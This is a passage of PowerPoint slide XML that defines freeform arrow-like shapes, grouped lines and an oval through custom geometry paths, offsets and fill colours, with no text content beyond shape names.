                  <a:ext cx="93" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 93"/>
                    <a:gd name="T1" fmla="*/ 9 h 41"/>
                    <a:gd name="T2" fmla="*/ 20 w 93"/>
                    <a:gd name="T3" fmla="*/ 0 h 41"/>
                    <a:gd name="T4" fmla="*/ 71 w 93"/>
                    <a:gd name="T5" fmla="*/ 25 h 41"/>
                    <a:gd name="T6" fmla="*/ 93 w 93"/>
                    <a:gd name="T7" fmla="*/ 18 h 41"/>
                    <a:gd name="T8" fmla="*/ 81 w 93"/>
                    <a:gd name="T9" fmla="*/ 41 h 41"/>
                    <a:gd name="T10" fmla="*/ 22 w 93"/>
                    <a:gd name="T11" fmla="*/ 41 h 41"/>
                    <a:gd name="T12" fmla="*/ 46 w 93"/>
                    <a:gd name="T13" fmla="*/ 34 h 41"/>
                    <a:gd name="T14" fmla="*/ 0 w 93"/>
                    <a:gd name="T15" fmla="*/ 9 h 41"/>
                    <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T18" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T19" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T20" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T21" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T22" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T23" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T24" fmla="*/ 0 w 93"/>
                    <a:gd name="T25" fmla="*/ 0 h 41"/>
                    <a:gd name="T26" fmla="*/ 93 w 9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 h="41">
                      <a:moveTo>
                        <a:pt x="0" y="9"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="20" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="71" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="93" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="46" y="34"/>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01" name="Freeform 1081"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3565" y="1869"/>
                  <a:ext cx="93" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 93"/>
                    <a:gd name="T1" fmla="*/ 9 h 41"/>
                    <a:gd name="T2" fmla="*/ 20 w 93"/>
                    <a:gd name="T3" fmla="*/ 0 h 41"/>
                    <a:gd name="T4" fmla="*/ 71 w 93"/>
                    <a:gd name="T5" fmla="*/ 25 h 41"/>
                    <a:gd name="T6" fmla="*/ 93 w 93"/>
                    <a:gd name="T7" fmla="*/ 18 h 41"/>
                    <a:gd name="T8" fmla="*/ 81 w 93"/>
                    <a:gd name="T9" fmla="*/ 41 h 41"/>
                    <a:gd name="T10" fmla="*/ 22 w 93"/>
                    <a:gd name="T11" fmla="*/ 41 h 41"/>
                    <a:gd name="T12" fmla="*/ 46 w 93"/>
                    <a:gd name="T13" fmla="*/ 34 h 41"/>
                    <a:gd name="T14" fmla="*/ 0 w 93"/>
                    <a:gd name="T15" fmla="*/ 9 h 41"/>
                    <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T18" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T19" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T20" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T21" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T22" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T23" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T24" fmla="*/ 0 w 93"/>
                    <a:gd name="T25" fmla="*/ 0 h 41"/>
                    <a:gd name="T26" fmla="*/ 93 w 9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3" h="41">
                      <a:moveTo>
                        <a:pt x="0" y="9"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="20" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="71" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="93" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="46" y="34"/>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02" name="Freeform 1082"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3658" y="1924"/>
                  <a:ext cx="94" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 94 w 94"/>
                    <a:gd name="T1" fmla="*/ 32 h 41"/>
                    <a:gd name="T2" fmla="*/ 73 w 94"/>
                    <a:gd name="T3" fmla="*/ 41 h 41"/>
                    <a:gd name="T4" fmla="*/ 24 w 94"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 0 w 94"/>
                    <a:gd name="T7" fmla="*/ 22 h 41"/>
                    <a:gd name="T8" fmla="*/ 12 w 94"/>
                    <a:gd name="T9" fmla="*/ 0 h 41"/>
                    <a:gd name="T10" fmla="*/ 73 w 94"/>
                    <a:gd name="T11" fmla="*/ 0 h 41"/>
                    <a:gd name="T12" fmla="*/ 47 w 94"/>
                    <a:gd name="T13" fmla="*/ 6 h 41"/>
                    <a:gd name="T14" fmla="*/ 94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94" y="32"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="73" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94"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403" name="Freeform 1083"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3658" y="1924"/>
                  <a:ext cx="94" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 94 w 94"/>
                    <a:gd name="T1" fmla="*/ 32 h 41"/>
                    <a:gd name="T2" fmla="*/ 73 w 94"/>
                    <a:gd name="T3" fmla="*/ 41 h 41"/>
                    <a:gd name="T4" fmla="*/ 24 w 94"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 0 w 94"/>
                    <a:gd name="T7" fmla="*/ 22 h 41"/>
                    <a:gd name="T8" fmla="*/ 12 w 94"/>
                    <a:gd name="T9" fmla="*/ 0 h 41"/>
                    <a:gd name="T10" fmla="*/ 73 w 94"/>
                    <a:gd name="T11" fmla="*/ 0 h 41"/>
                    <a:gd name="T12" fmla="*/ 47 w 94"/>
                    <a:gd name="T13" fmla="*/ 6 h 41"/>
                    <a:gd name="T14" fmla="*/ 94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94" y="32"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="73" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94"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6387" name="Group 1084"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3561" y="1871"/>
                <a:ext cx="196" cy="96"/>
                <a:chOff x="3561" y="1871"/>
                <a:chExt cx="196" cy="96"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="56388" name="Freeform 1085"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3663" y="1873"/>
                  <a:ext cx="94" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 94"/>
                    <a:gd name="T1" fmla="*/ 32 h 41"/>
                    <a:gd name="T2" fmla="*/ 21 w 94"/>
                    <a:gd name="T3" fmla="*/ 41 h 41"/>
                    <a:gd name="T4" fmla="*/ 71 w 94"/>
                    <a:gd name="T5" fmla="*/ 14 h 41"/>
                    <a:gd name="T6" fmla="*/ 94 w 94"/>
                    <a:gd name="T7" fmla="*/ 23 h 41"/>
                    <a:gd name="T8" fmla="*/ 82 w 94"/>
                    <a:gd name="T9" fmla="*/ 0 h 41"/>
                    <a:gd name="T10" fmla="*/ 23 w 94"/>
                    <a:gd name="T11" fmla="*/ 0 h 41"/>
                    <a:gd name="T12" fmla="*/ 47 w 94"/>
                    <a:gd name="T13" fmla="*/ 7 h 41"/>
                    <a:gd name="T14" fmla="*/ 0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0" y="32"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="21" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="71" y="14"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="82" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="7"/>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89" name="Freeform 1086"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3663" y="1873"/>
                  <a:ext cx="94" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 94"/>
                    <a:gd name="T1" fmla="*/ 32 h 41"/>
                    <a:gd name="T2" fmla="*/ 21 w 94"/>
                    <a:gd name="T3" fmla="*/ 41 h 41"/>
                    <a:gd name="T4" fmla="*/ 71 w 94"/>
                    <a:gd name="T5" fmla="*/ 14 h 41"/>
                    <a:gd name="T6" fmla="*/ 94 w 94"/>
                    <a:gd name="T7" fmla="*/ 23 h 41"/>
                    <a:gd name="T8" fmla="*/ 82 w 94"/>
                    <a:gd name="T9" fmla="*/ 0 h 41"/>
                    <a:gd name="T10" fmla="*/ 23 w 94"/>
                    <a:gd name="T11" fmla="*/ 0 h 41"/>
                    <a:gd name="T12" fmla="*/ 47 w 94"/>
                    <a:gd name="T13" fmla="*/ 7 h 41"/>
                    <a:gd name="T14" fmla="*/ 0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0" y="32"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="21" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="71" y="14"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="82" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="7"/>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0" name="Freeform 1087"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3561" y="1921"/>
                  <a:ext cx="94" cy="44"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 94 w 94"/>
                    <a:gd name="T1" fmla="*/ 9 h 44"/>
                    <a:gd name="T2" fmla="*/ 73 w 94"/>
                    <a:gd name="T3" fmla="*/ 0 h 44"/>
                    <a:gd name="T4" fmla="*/ 24 w 94"/>
                    <a:gd name="T5" fmla="*/ 28 h 44"/>
                    <a:gd name="T6" fmla="*/ 0 w 94"/>
                    <a:gd name="T7" fmla="*/ 19 h 44"/>
                    <a:gd name="T8" fmla="*/ 12 w 94"/>
                    <a:gd name="T9" fmla="*/ 44 h 44"/>
                    <a:gd name="T10" fmla="*/ 73 w 94"/>
                    <a:gd name="T11" fmla="*/ 44 h 44"/>
                    <a:gd name="T12" fmla="*/ 47 w 94"/>
                    <a:gd name="T13" fmla="*/ 35 h 44"/>
                    <a:gd name="T14" fmla="*/ 94 w 9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4"/>
                    <a:gd name="T26" fmla="*/ 94 w 9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4">
                      <a:moveTo>
                        <a:pt x="94" y="9"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="73" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9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1" name="Freeform 1088"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3561" y="1921"/>
                  <a:ext cx="94" cy="44"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 94 w 94"/>
                    <a:gd name="T1" fmla="*/ 9 h 44"/>
                    <a:gd name="T2" fmla="*/ 73 w 94"/>
                    <a:gd name="T3" fmla="*/ 0 h 44"/>
                    <a:gd name="T4" fmla="*/ 24 w 94"/>
                    <a:gd name="T5" fmla="*/ 28 h 44"/>
                    <a:gd name="T6" fmla="*/ 0 w 94"/>
                    <a:gd name="T7" fmla="*/ 19 h 44"/>
                    <a:gd name="T8" fmla="*/ 12 w 94"/>
                    <a:gd name="T9" fmla="*/ 44 h 44"/>
                    <a:gd name="T10" fmla="*/ 73 w 94"/>
                    <a:gd name="T11" fmla="*/ 44 h 44"/>
                    <a:gd name="T12" fmla="*/ 47 w 94"/>
                    <a:gd name="T13" fmla="*/ 35 h 44"/>
                    <a:gd name="T14" fmla="*/ 94 w 94"/>
                    <a:gd name="T15" fmla="*/ 9 h 44"/>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4"/>
                    <a:gd name="T26" fmla="*/ 94 w 94"/>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4">
                      <a:moveTo>
                        <a:pt x="94" y="9"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="73" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9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2" name="Freeform 1089"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3566" y="1871"/>
                  <a:ext cx="94" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 94"/>
                    <a:gd name="T1" fmla="*/ 9 h 41"/>
                    <a:gd name="T2" fmla="*/ 21 w 94"/>
                    <a:gd name="T3" fmla="*/ 0 h 41"/>
                    <a:gd name="T4" fmla="*/ 71 w 94"/>
                    <a:gd name="T5" fmla="*/ 25 h 41"/>
                    <a:gd name="T6" fmla="*/ 94 w 94"/>
                    <a:gd name="T7" fmla="*/ 18 h 41"/>
                    <a:gd name="T8" fmla="*/ 82 w 94"/>
                    <a:gd name="T9" fmla="*/ 41 h 41"/>
                    <a:gd name="T10" fmla="*/ 23 w 94"/>
                    <a:gd name="T11" fmla="*/ 41 h 41"/>
                    <a:gd name="T12" fmla="*/ 47 w 94"/>
                    <a:gd name="T13" fmla="*/ 34 h 41"/>
                    <a:gd name="T14" fmla="*/ 0 w 94"/>
                    <a:gd name="T15" fmla="*/ 9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0" y="9"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="21" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="71" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="82" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="34"/>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3" name="Freeform 1090"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3566" y="1871"/>
                  <a:ext cx="94" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 94"/>
                    <a:gd name="T1" fmla="*/ 9 h 41"/>
                    <a:gd name="T2" fmla="*/ 21 w 94"/>
                    <a:gd name="T3" fmla="*/ 0 h 41"/>
                    <a:gd name="T4" fmla="*/ 71 w 94"/>
                    <a:gd name="T5" fmla="*/ 25 h 41"/>
                    <a:gd name="T6" fmla="*/ 94 w 94"/>
                    <a:gd name="T7" fmla="*/ 18 h 41"/>
                    <a:gd name="T8" fmla="*/ 82 w 94"/>
                    <a:gd name="T9" fmla="*/ 41 h 41"/>
                    <a:gd name="T10" fmla="*/ 23 w 94"/>
                    <a:gd name="T11" fmla="*/ 41 h 41"/>
                    <a:gd name="T12" fmla="*/ 47 w 94"/>
                    <a:gd name="T13" fmla="*/ 34 h 41"/>
                    <a:gd name="T14" fmla="*/ 0 w 94"/>
                    <a:gd name="T15" fmla="*/ 9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0" y="9"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="21" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="71" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="82" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="34"/>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4" name="Freeform 1091"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3660" y="1926"/>
                  <a:ext cx="94" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 94 w 94"/>
                    <a:gd name="T1" fmla="*/ 32 h 41"/>
                    <a:gd name="T2" fmla="*/ 73 w 94"/>
                    <a:gd name="T3" fmla="*/ 41 h 41"/>
                    <a:gd name="T4" fmla="*/ 24 w 94"/>
                    <a:gd name="T5" fmla="*/ 14 h 41"/>
                    <a:gd name="T6" fmla="*/ 0 w 94"/>
                    <a:gd name="T7" fmla="*/ 23 h 41"/>
                    <a:gd name="T8" fmla="*/ 12 w 94"/>
                    <a:gd name="T9" fmla="*/ 0 h 41"/>
                    <a:gd name="T10" fmla="*/ 73 w 94"/>
                    <a:gd name="T11" fmla="*/ 0 h 41"/>
                    <a:gd name="T12" fmla="*/ 47 w 94"/>
                    <a:gd name="T13" fmla="*/ 7 h 41"/>
                    <a:gd name="T14" fmla="*/ 94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94" y="32"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="73" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="14"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="7"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9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95" name="Freeform 1092"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3660" y="1926"/>
                  <a:ext cx="94" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 94 w 94"/>
                    <a:gd name="T1" fmla="*/ 32 h 41"/>
                    <a:gd name="T2" fmla="*/ 73 w 94"/>
                    <a:gd name="T3" fmla="*/ 41 h 41"/>
                    <a:gd name="T4" fmla="*/ 24 w 94"/>
                    <a:gd name="T5" fmla="*/ 14 h 41"/>
                    <a:gd name="T6" fmla="*/ 0 w 94"/>
                    <a:gd name="T7" fmla="*/ 23 h 41"/>
                    <a:gd name="T8" fmla="*/ 12 w 94"/>
                    <a:gd name="T9" fmla="*/ 0 h 41"/>
                    <a:gd name="T10" fmla="*/ 73 w 94"/>
                    <a:gd name="T11" fmla="*/ 0 h 41"/>
                    <a:gd name="T12" fmla="*/ 47 w 94"/>
                    <a:gd name="T13" fmla="*/ 7 h 41"/>
                    <a:gd name="T14" fmla="*/ 94 w 94"/>
                    <a:gd name="T15" fmla="*/ 32 h 41"/>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41"/>
                    <a:gd name="T26" fmla="*/ 94 w 9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41">
                      <a:moveTo>
                        <a:pt x="94" y="32"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="73" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="14"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="7"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9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56384" name="Line 1093"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3516" y="1917"/>
              <a:ext cx="1" cy="91"/>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85" name="Line 1094"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3800" y="1917"/>
              <a:ext cx="1" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="3175">
              <a:solidFill>
                <a:srgbClr val="AAE6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6326" name="Group 1095"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="1905000"/>
            <a:ext cx="2514600" cy="1066800"/>
            <a:chOff x="4099" y="1858"/>
            <a:chExt cx="496" cy="433"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="56365" name="Group 1096"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4099" y="1858"/>
              <a:ext cx="496" cy="433"/>
              <a:chOff x="4099" y="1858"/>
              <a:chExt cx="496" cy="433"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56368" name="Oval 1097"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4217" y="1858"/>
                <a:ext cx="212" cy="117"/>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69" name="Freeform 1098"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4399" y="1891"/>
                <a:ext cx="141" cy="106"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 81 w 141"/>
                  <a:gd name="T1" fmla="*/ 6 h 106"/>
                  <a:gd name="T2" fmla="*/ 52 w 141"/>
                  <a:gd name="T3" fmla="*/ 0 h 106"/>
                  <a:gd name="T4" fmla="*/ 28 w 141"/>
                  <a:gd name="T5" fmla="*/ 6 h 106"/>
                  <a:gd name="T6" fmla="*/ 9 w 141"/>
                  <a:gd name="T7" fmla="*/ 14 h 106"/>
                  <a:gd name="T8" fmla="*/ 4 w 141"/>
                  <a:gd name="T9" fmla="*/ 23 h 106"/>
                  <a:gd name="T10" fmla="*/ 0 w 141"/>
                  <a:gd name="T11" fmla="*/ 31 h 106"/>
                  <a:gd name="T12" fmla="*/ 0 w 141"/>
                  <a:gd name="T13" fmla="*/ 39 h 106"/>
                  <a:gd name="T14" fmla="*/ 2 w 141"/>
                  <a:gd name="T15" fmla="*/ 50 h 106"/>
                  <a:gd name="T16" fmla="*/ 7 w 141"/>
                  <a:gd name="T17" fmla="*/ 61 h 106"/>
                  <a:gd name="T18" fmla="*/ 14 w 141"/>
                  <a:gd name="T19" fmla="*/ 70 h 106"/>
                  <a:gd name="T20" fmla="*/ 33 w 141"/>
                  <a:gd name="T21" fmla="*/ 87 h 106"/>
                  <a:gd name="T22" fmla="*/ 60 w 141"/>
                  <a:gd name="T23" fmla="*/ 100 h 106"/>
                  <a:gd name="T24" fmla="*/ 88 w 141"/>
                  <a:gd name="T25" fmla="*/ 106 h 106"/>
                  <a:gd name="T26" fmla="*/ 115 w 141"/>
                  <a:gd name="T27" fmla="*/ 100 h 106"/>
                  <a:gd name="T28" fmla="*/ 132 w 141"/>
                  <a:gd name="T29" fmla="*/ 92 h 106"/>
                  <a:gd name="T30" fmla="*/ 139 w 141"/>
                  <a:gd name="T31" fmla="*/ 84 h 106"/>
                  <a:gd name="T32" fmla="*/ 141 w 141"/>
                  <a:gd name="T33" fmla="*/ 75 h 106"/>
                  <a:gd name="T34" fmla="*/ 141 w 141"/>
                  <a:gd name="T35" fmla="*/ 67 h 106"/>
                  <a:gd name="T36" fmla="*/ 141 w 141"/>
                  <a:gd name="T37" fmla="*/ 56 h 106"/>
                  <a:gd name="T38" fmla="*/ 136 w 141"/>
                  <a:gd name="T39" fmla="*/ 45 h 106"/>
                  <a:gd name="T40" fmla="*/ 129 w 141"/>
                  <a:gd name="T41" fmla="*/ 36 h 106"/>
                  <a:gd name="T42" fmla="*/ 108 w 141"/>
                  <a:gd name="T43" fmla="*/ 20 h 106"/>
                  <a:gd name="T44" fmla="*/ 81 w 141"/>
                  <a:gd name="T45" fmla="*/ 6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1"/>
                  <a:gd name="T70" fmla="*/ 0 h 106"/>
                  <a:gd name="T71" fmla="*/ 141 w 141"/>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1" h="106">
                    <a:moveTo>
                      <a:pt x="81" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:ln w="11113">
                <a:solidFill>
